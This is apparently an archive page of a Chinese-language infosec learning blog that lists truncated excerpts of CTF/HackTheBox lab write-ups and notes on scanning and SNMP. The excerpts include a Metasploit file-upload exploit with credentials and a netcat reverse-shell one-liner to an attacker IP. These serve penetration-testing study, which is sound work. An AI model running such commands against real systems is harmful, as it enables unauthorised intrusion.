InfoSec learning 
  • 首页
  • 归档
  • 分类
  • 关于
  • 思想星系
  •   
root@whale3070:~# _

Calamity(web rce)

nikto -h 10.10.10.27 Allowed HTTP Methods: OPTIONS, GET, HEAD, POST OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote

2019-03-21
部署过程 安全工具 渗透测试 Web漏洞利用

Apocalyst(CTF-like)

12345678922/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)| 256 76:92:39:0a:57:bd:f0:03:2

2019-03-21
部署过程 安全工具 渗透测试 CTF挑战

shell-script(二)

案例三:写一个bash script,目的是扫描40台主机的全部端口,服务版本,生成以IP为目录的扫描结果。案例三:写一个bash script,目的是扫描40台主机的全部端口,服务版本,生成以IP为目录的扫描结果。categories: - linux案例三:写一个bash script,目的是扫描40台主机的全部端口,服务版本,生成以IP为目录的扫描结果。 扫描网段内在线主机 1234nma

2019-03-21
运维 编程 部署过程 安全工具 网络扫描

cronOS(域名查询)

cat /etc/passwd | grep homeps -ef | grep rootroot 1083 1 0 Mar15 ? 00:00:00 /usr/sbin/cron -f 123#### mysql /var/www/admin/config.phpadmin

2019-03-16
安全工具 域渗透 渗透测试 Laravel安全 密码破解

Nibbles(sudo no pass )

文件上传获得shell12345678use exploit/multi/http/nibbleblog_file_uploadset RHOSTS 10.10.10.75set USERNAME adminset PASSWORD nibblesset TARGETURI /nibbleblogrun获得meterpreter shell 提权参考以前做过的方式LTR Scene(php写入一句

2019-03-14
部署过程 安全工具 渗透测试 靶机渗透

Carrier(snmp泄露敏感信息)

ifconfig123456789101112131415161718192021222324252627282930313233343536ifconfigeth0 Link encap:Ethernet HWaddr 00:16:3e:d9:04:ea inet addr:10.99.64.2 Bcast:10.99.64.255 Mask:255.255

2019-03-12
运维 网络设置 渗透测试 安全开发 SNMP安全

snmp&snmpwalk

161端口——snmp协议参考资料: http://www.freebuf.com/vuls/133517.html http://www.cnblogs.com/LittleHann/p/3834860.htmlcategories: tools 161端口——snmp协议参考资料: http://www.freebuf.com/vuls/133517.html http://www

2019-03-11
运维 网络设置 安全工具 协议分析

Irked(suid提权)

1 root ircd 43 Mar 10 03:58 listusers cd /usr/bin/; ./viewuser结果/bin/nc: /bin/nc: cannot execute binary file nc -e /bin/bash 10.10.14.7 2233 ![](13

2019-03-10
安全工具 域渗透 渗透测试 SUID提权

Lazy(密码学相关)

uname -aLinux LazyClown 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux i686说明是32位的系统版本 1234567![](6.PNG)成功反弹shell## 提权新建cat文件,内容是shell脚本。当suid程序执行ca

2019-03-09
过程记录 安全工具 渗透测试 密码学攻击

03-08-sql-inject

scan123480/tcp open http cloudflare443/tcp open ssl/https cloudflare8080/tcp open http-proxy cloudflare8443/tcp open ssl/https-alt cloudflare 确认为一个web server,有云防护,不允许直接ip访问 pin

2019-03-08
部署过程 过程记录 安全工具 渗透测试 SQL注入
1…109110111112113…128

搜索

Whale3070